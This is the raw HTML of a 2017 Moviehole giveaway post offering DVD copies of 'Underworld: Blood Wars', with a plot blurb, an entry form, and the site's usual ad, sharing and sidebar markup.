<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-74081"><a href="http://moviehole.net/tag/vod">VOD Views</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
                <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form method="get" class="td-search-form" action="http://moviehole.net/">
				<div role="search" class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-112907" class="post-112907 post type-post status-publish format-standard has-post-thumbnail hentry category-giveaways tag-underworld-blood-wars" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://moviehole.net/category/giveaways">Giveaways</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Underworld: Blood Wars</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a href="http://moviehole.net/author/ashleigh-davies">Ash</a> - </div>                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-03-20T01:12:17+00:00" >Mar 20, 2017</time></span>                                        <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-112907">7</span></div>                </div>

            </header>

        </div>

        

        <div class="td-post-content">

        <div class="td-post-featured-image"><img width="696" height="464" class="entry-thumb" src="http://moviehole.net/img/underworld-1-696x464.jpg" alt="" title="underworld"/></div>
        <p>To celebrate the release of &#8220;Underworld: Blood Wars&#8221;, out on Blu-Ray and DVD March 22, Moviehole has 10 DVD copies of the film to giveaway!</p>

 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_inlineright">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="8634979609"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

<p><i>In the next instalment of the blockbuster franchise, we follow Vampire death dealer, Selene (Kate Beckinsale) as she fends off brutal attacks from both the Lycan clan and the Vampire faction that betrayed her. With her only allies, David (Theo James) and his father Thomas (Charles Dance), she must stop the eternal war between Lycans and Vampires, even if it means she has to make the ultimate sacrifice.</i></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><a href="http://moviehole.net/img/DF4956_Underworld-Blood-Wars_AUNZ_DVD_3D.jpg"><img class="alignright wp-image-112313" src="http://moviehole.net/img/DF4956_Underworld-Blood-Wars_AUNZ_DVD_3D.jpg" alt="" width="352" height="418" /></a></p>
<p><strong>How To Win</strong> :<br />
Fill out your details below, and tell us, in the answer box: Which &#8220;Underworld&#8221; film is your favourite and why?</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div role="form" class="wpcf7" id="wpcf7-f83018-p112907-o1" lang="en-US" dir="ltr">
<div class="screen-reader-response"></div>
<form action="/2017112907underworld-blood-wars#wpcf7-f83018-p112907-o1" method="post" class="wpcf7-form" novalidate="novalidate">
<div style="display: none;">
<input type="hidden" name="_wpcf7" value="83018" />
<input type="hidden" name="_wpcf7_version" value="4.6.1" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f83018-p112907-o1" />
<input type="hidden" name="_wpnonce" value="c025775f6d" />
</div>
<p>Your Name (required)<br />
    <span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </p>
<p>Your Email (required)<br />
    <span class="wpcf7-form-control-wrap your-email"><input type="email" name="your-email" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email" aria-required="true" aria-invalid="false" /></span> </p>
<p>Answer<br />
    <span class="wpcf7-form-control-wrap your-subject"><input type="text" name="your-subject" value="" size="40" class="wpcf7-form-control wpcf7-text" aria-invalid="false" /></span> </p>
<p>Your Postal Address<br />
    <span class="wpcf7-form-control-wrap your-message"><textarea name="your-message" cols="40" rows="10" class="wpcf7-form-control wpcf7-textarea" aria-invalid="false"></textarea></span> </p>
<p><input type="submit" value="Send" class="wpcf7-form-control wpcf7-submit" /></p>
<p><input type="hidden" name="_wpcf7_captcha_challenge_captcha-992" value="3479266967" /><img class="wpcf7-form-control wpcf7-captchac wpcf7-captcha-captcha-992" width="72" height="24" alt="captcha" src="http://moviehole.net/img/wpcf7_captcha/3479266967.png" /><br />
<span class="wpcf7-form-control-wrap captcha-992"><input type="text" name="captcha-992" value="" size="40" class="wpcf7-form-control wpcf7-captchar" autocomplete="off" aria-invalid="false" /></span></p>
<div class="wpcf7-response-output wpcf7-display-none"></div></form></div>
<p><strong>This competition closes at 6pm AEST on April 9</strong></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-112907" class="share-twitter sd-button share-icon no-text" href="http://moviehole.net/2017112907underworld-blood-wars?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-112907" class="share-facebook sd-button share-icon no-text" href="http://moviehole.net/2017112907underworld-blood-wars?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-112907" class="share-google-plus-1 sd-button share-icon no-text" href="http://moviehole.net/2017112907underworld-blood-wars?share=google-plus-1" target="_blank" title="Click to share on Google+"><span></span><span class="sharing-screen-reader-text">Click to share on Google+ (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="http://moviehole.net/tag/underworld-blood-wars">Underworld : Blood Wars</a></li></ul>            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fmoviehole.net%2F2017112907underworld-blood-wars" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Underworld%3A+Blood+Wars&url=http%3A%2F%2Fmoviehole.net%2F2017112907underworld-blood-wars&via=moviehole"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://moviehole.net/2017112907underworld-blood-wars" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://moviehole.net/2017112907underworld-blood-wars&amp;media=http://moviehole.net/img/underworld-1.jpg&description=Underworld%3A+Blood+Wars" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Underworld%3A+Blood+Wars%20-%20http%3A%2F%2Fmoviehole.net%2F2017112907underworld-blood-wars" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://moviehole.net/2017112907underworld-blood-wars&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://moviehole.net/2017112907underworld-blood-wars" data-text="Underworld: Blood Wars" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://moviehole.net/2017113729sam-elliott-warners-starry-musical-remake">Sam Elliott in Warner&#8217;s <i>Star</i>ry musical remake</a></div></div><div class="td-next-prev-separator"></div></div>            <div class="author-box-wrap"><a href="http://moviehole.net/author/ashleigh-davies"><img src="http://moviehole.net/img/shorange-150x150.jpg" width="96" height="96" alt="Ash" class="avatar avatar-96 wp-user-avatar wp-user-avatar-96 alignnone photo" /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://moviehole.net/author/ashleigh-davies">Ash</a></span></div><div class="td-author-url"><a href="http://www.moviehole.net">http://www.moviehole.net</a></div><div class="td-author-description">Ashleigh is an editor and one of the day-to-day managers of Moviehole.
Also been known to binge watch "Friends" and "Orange is the New Black".</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Ash"></span><meta itemprop="datePublished" content="2017-03-20T01:12:17+00:00"><meta itemprop="dateModified" content="2017-02-27T02:28:08+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://moviehole.net/2017112907underworld-blood-wars"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://moviehole.net/img/logomoviehole-700x295.png"></span><meta itemprop="name" content="Moviehole"></span><meta itemprop="headline " content="Underworld: Blood Wars"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://moviehole.net/img/underworld-1.jpg"><meta itemprop="width" content="1350"><meta itemprop="height" content="900"></span>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_58cf2d9cd7548 = new tdBlock();
block_td_uid_1_58cf2d9cd7548.id = "td_uid_1_58cf2d9cd7548";
block_td_uid_1_58cf2d9cd7548.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_1_58cf2d9cd7548_rand","offset":"","live_filter":"cur_post_same_tags","live_filter_cur_post_id":112907,"live_filter_cur_post_author":"113"}';
block_td_uid_1_58cf2d9cd7548.td_column_number = "3";
block_td_uid_1_58cf2d9cd7548.block_type = "td_block_related_posts";
block_td_uid_1_58cf2d9cd7548.post_count = "1";
block_td_uid_1_58cf2d9cd7548.found_posts = "1";
block_td_uid_1_58cf2d9cd7548.header_color = "";
block_td_uid_1_58cf2d9cd7548.ajax_pagination_infinite_stop = "";
block_td_uid_1_58cf2d9cd7548.max_num_pages = "1";
tdBlocksArray.push(block_td_uid_1_58cf2d9cd7548);
</script><div class="td_block_wrap td_block_related_posts td_uid_1_58cf2d9cd7548_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_1_58cf2d9cd7548" ><h4 class="td-related-title"><a id="td_uid_2_58cf2d9cdc007" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_58cf2d9cd7548" href="#">RELATED ARTICLES</a><a id="td_uid_3_58cf2d9cdc051" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_58cf2d9cd7548" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_58cf2d9cd7548 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2016106711well-wait-little-longer-underworld-5" rel="bookmark" title="We&#8217;ll have to wait a little longer for Underworld 5"><img width="218" height="141" class="entry-thumb" src="http://moviehole.net/img/underworld1.jpg" alt="" title="We&#8217;ll have to wait a little longer for Underworld 5"/></a></div>                <a href="http://moviehole.net/category/news" class="td-post-category">Movie News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2016106711well-wait-little-longer-underworld-5" rel="bookmark" title="We&#8217;ll have to wait a little longer for Underworld 5">We&#8217;ll have to wait a little longer for Underworld 5</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_58cf2d9cd7548" data-td_block_id="td_uid_1_58cf2d9cd7548"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page ajax-page-disabled" id="next-page-td_uid_1_58cf2d9cd7548" data-td_block_id="td_uid_1_58cf2d9cd7548"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
            </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="9931553201"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


<style scoped>
.td_uid_4_58cf2d9cde061_rand .td_module_wrap:hover .entry-title a,
            .td_uid_4_58cf2d9cde061_rand a.td-pulldown-filter-link:hover,
            .td_uid_4_58cf2d9cde061_rand .td-subcat-item a:hover,
            .td_uid_4_58cf2d9cde061_rand .td-subcat-item .td-cur-simple-item,
            .td_uid_4_58cf2d9cde061_rand .td_quote_on_blocks,
            .td_uid_4_58cf2d9cde061_rand .td-opacity-cat .td-post-category:hover,
            .td_uid_4_58cf2d9cde061_rand .td-opacity-read .td-read-more a:hover,
            .td_uid_4_58cf2d9cde061_rand .td-opacity-author .td-post-author-name a:hover,
            .td_uid_4_58cf2d9cde061_rand .td-instagram-user a {
                color: #2f51b4;
            }

            .td_uid_4_58cf2d9cde061_rand .td-next-prev-wrap a:hover,
            .td_uid_4_58cf2d9cde061_rand .td-load-more-wrap a:hover {
                background-color: #2f51b4;
                border-color: #2f51b4;
            }

            .td_uid_4_58cf2d9cde061_rand .block-title span,
            .td_uid_4_58cf2d9cde061_rand .td-trending-now-title,
            .td_uid_4_58cf2d9cde061_rand .block-title a,
            .td_uid_4_58cf2d9cde061_rand .td-read-more a,
            .td_uid_4_58cf2d9cde061_rand .td-weather-information:before,
            .td_uid_4_58cf2d9cde061_rand .td-weather-week:before,
            .td_uid_4_58cf2d9cde061_rand .td-subcat-dropdown:hover .td-subcat-more,
            .td_uid_4_58cf2d9cde061_rand .td-exchange-header:before,
            .td_uid_4_58cf2d9cde061_rand .td-post-category:hover {
                background-color: #2f51b4;
            }

            .td_uid_4_58cf2d9cde061_rand .block-title {
                border-color: #2f51b4;
            }

            
            .td_uid_4_58cf2d9cde061_rand .block-title span,
            .td_uid_4_58cf2d9cde061_rand .td-trending-now-title,
            .td_uid_4_58cf2d9cde061_rand .block-title a {
                color: #fFFFFF;
            }
</style><script>var block_td_uid_4_58cf2d9cde061 = new tdBlock();
block_td_uid_4_58cf2d9cde061.id = "td_uid_4_58cf2d9cde061";
block_td_uid_4_58cf2d9cde061.atts = '{"limit":"8","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"5767","category_ids":"","custom_title":"REVIEWS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#2f51b4","header_text_color":"#fFFFFF","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"td_popularity_filter_fa","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_4_58cf2d9cde061_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_4_58cf2d9cde061.td_column_number = "1";
block_td_uid_4_58cf2d9cde061.block_type = "td_block_15";
block_td_uid_4_58cf2d9cde061.post_count = "8";
block_td_uid_4_58cf2d9cde061.found_posts = "397";
block_td_uid_4_58cf2d9cde061.header_color = "#2f51b4";
block_td_uid_4_58cf2d9cde061.ajax_pagination_infinite_stop = "";
block_td_uid_4_58cf2d9cde061.max_num_pages = "50";
tdBlocksArray.push(block_td_uid_4_58cf2d9cde061);
</script><div class="td_block_wrap td_block_15 td_block_widget td_uid_4_58cf2d9cde061_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_4_58cf2d9cde061" ><h4 class="block-title"><span>REVIEWS</span></h4><div class="td-subcat-filter" id="td_pulldown_td_uid_4_58cf2d9cde061"><ul class="td-subcat-list" id="td_pulldown_td_uid_4_58cf2d9cde061_list"><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_5_58cf2d9ce0ead" data-td_filter_value="" data-td_block_id="td_uid_4_58cf2d9cde061" href="#">All</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_6_58cf2d9ce0eeb" data-td_filter_value="featured" data-td_block_id="td_uid_4_58cf2d9cde061" href="#">Featured</a></li><li class="td-subcat-item"><a class="td-subcat-link" id="td_uid_7_58cf2d9ce0f25" data-td_filter_value="popular" data-td_block_id="td_uid_4_58cf2d9cde061" href="#">All time popular</a></li></ul><div class="td-subcat-dropdown"><div class="td-subcat-more" aria-haspopup="true"><span>More</span><i class="td-icon-read-down"></i></div><ul class="td-pulldown-filter-list"></ul></div></div><div id=td_uid_4_58cf2d9cde061 class="td_block_inner td-column-1">

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017113375kong-skull-island" rel="bookmark" title="Kong: Skull Island"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/kong-2-218x150.jpg" alt="" title="Kong: Skull Island"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113375kong-skull-island" rel="bookmark" title="Kong: Skull Island">Kong: Skull Island</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017113301before-i-fall" rel="bookmark" title="Before I Fall"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/beforeifall-218x150.jpg" alt="" title="Before I Fall"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113301before-i-fall" rel="bookmark" title="Before I Fall">Before I Fall</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017113298logan" rel="bookmark" title="Logan"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/logan-1-218x150.jpg" alt="" title="Logan"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017113298logan" rel="bookmark" title="Logan">Logan</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112994my-name-is-emily" rel="bookmark" title="My Name is Emily"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/Stills_Feature_MyNameIsEmily_03-218x150.jpg" alt="" title="My Name is Emily"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112994my-name-is-emily" rel="bookmark" title="My Name is Emily">My Name is Emily</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112952in-dubious-battle" rel="bookmark" title="In Dubious Battle"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/indubiousbattle_04-218x150.jpg" alt="" title="In Dubious Battle"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112952in-dubious-battle" rel="bookmark" title="In Dubious Battle">In Dubious Battle</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112949fist-fight" rel="bookmark" title="Fist Fight"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/fistgigh-218x150.jpg" alt="" title="Fist Fight"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112949fist-fight" rel="bookmark" title="Fist Fight">Fist Fight</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112731fifty-shades-darker" rel="bookmark" title="Fifty Shades Darker"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/fiftyshadesdarker-218x150.jpeg" alt="" title="Fifty Shades Darker"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112731fifty-shades-darker" rel="bookmark" title="Fifty Shades Darker">Fifty Shades Darker</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://moviehole.net/2017112513the-eyes-of-my-mother" rel="bookmark" title="The Eyes Of My Mother"><img width="218" height="150" class="entry-thumb" src="http://moviehole.net/img/eyes-of-my-mother-2-218x150.jpg" alt="" title="The Eyes Of My Mother"/></a></div>                            </div>

            <h3 class="entry-title td-module-title"><a href="http://moviehole.net/2017112513the-eyes-of-my-mother" rel="bookmark" title="The Eyes Of My Mother">The Eyes Of My Mother</a></h3>
        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_4_58cf2d9cde061" data-td_block_id="td_uid_4_58cf2d9cde061"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_4_58cf2d9cde061" data-td_block_id="td_uid_4_58cf2d9cde061"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block --><div class="clearfix"></div>
<style scoped>
.td_uid_8_58cf2d9ce8804_rand .td_module_wrap:hover .entry-title a,
            .td_uid_8_58cf2d9ce8804_rand a.td-pulldown-filter-link:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-subcat-item a:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-subcat-item .td-cur-simple-item,
            .td_uid_8_58cf2d9ce8804_rand .td_quote_on_blocks,
            .td_uid_8_58cf2d9ce8804_rand .td-opacity-cat .td-post-category:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-opacity-read .td-read-more a:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-opacity-author .td-post-author-name a:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-instagram-user a {
                color: #e32020;
            }

            .td_uid_8_58cf2d9ce8804_rand .td-next-prev-wrap a:hover,
            .td_uid_8_58cf2d9ce8804_rand .td-load-more-wrap a:hover {
                background-color: #e32020;
                border-color: #e32020;
            }

            .td_uid_8_58cf2d9ce8804_rand .block-title span,
            .td_uid_8_58cf2d9ce8804_rand .td-trending-now-title,
            .td_uid_8_58cf2d9ce8804_rand .block-title a,
            .td_uid_8_58cf2d9ce8804_rand .td-read-more a,
            .td_uid_8_58cf2d9ce8804_rand .td-weather-information:before,
            .td_uid_8_58cf2d9ce8804_rand .td-weather-week:before,
            .td_uid_8_58cf2d9ce8804_rand .td-subcat-dropdown:hover .td-subcat-more,
            .td_uid_8_58cf2d9ce8804_rand .td-exchange-header:before,
            .td_uid_8_58cf2d9ce8804_rand .td-post-category:hover {
                background-color: #e32020;
            }

            .td_uid_8_58cf2d9ce8804_rand .block-title {
                border-color: #e32020;
            }

            
            .td_uid_8_58cf2d9ce8804_rand .block-title span,
            .td_uid_8_58cf2d9ce8804_rand .td-trending-now-title,
            .td_uid_8_58cf2d9ce8804_rand .block-title a {
                color: #;
            }
</style><script>var block_td_uid_8_58cf2d9ce8804 = new tdBlock();
block_td_uid_8_58cf2d9ce8804.id = "td_uid_8_58cf2d9ce8804";
block_td_uid_8_58cf2d9ce8804.atts = '{"limit":"1","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"5","category_ids":"","custom_title":"INTERVIEW","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"#e32020","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_8_58cf2d9ce8804_rand","offset":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_8_58cf2d9ce8804.td_column_number = "1";
block_td_uid_8_58cf2d9ce8804.block_type = "td_block_14";
block_td_uid_8_58cf2d9ce8804.post_count = "1";
block_td_uid_8_58cf2d9ce8804.found_posts = "1295";
block_td_uid_8_58cf2d9ce8804.header_color = "#e32020";
block_td_uid_8_58cf2d9ce8804.ajax_pagination_infinite_stop = "";
block_td_uid_8_58cf2d9ce8804.max_num_pages = "1295";
tdBlocksArray.push(block_td_uid_8_58cf2d9ce8804);
</script><div class="td_block_wrap td_block_14 td_block_widget td_uid_8_58cf2d9ce8804_rand td-pb-full-cell td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_8_58cf2d9ce8804" ><h4 class="block-title"><span>INTERVIEW</span></h4><div id=td_uid_8_58cf2d9ce8804 class="td_block_inner td-column-1">

	<div class="td-block-span12">

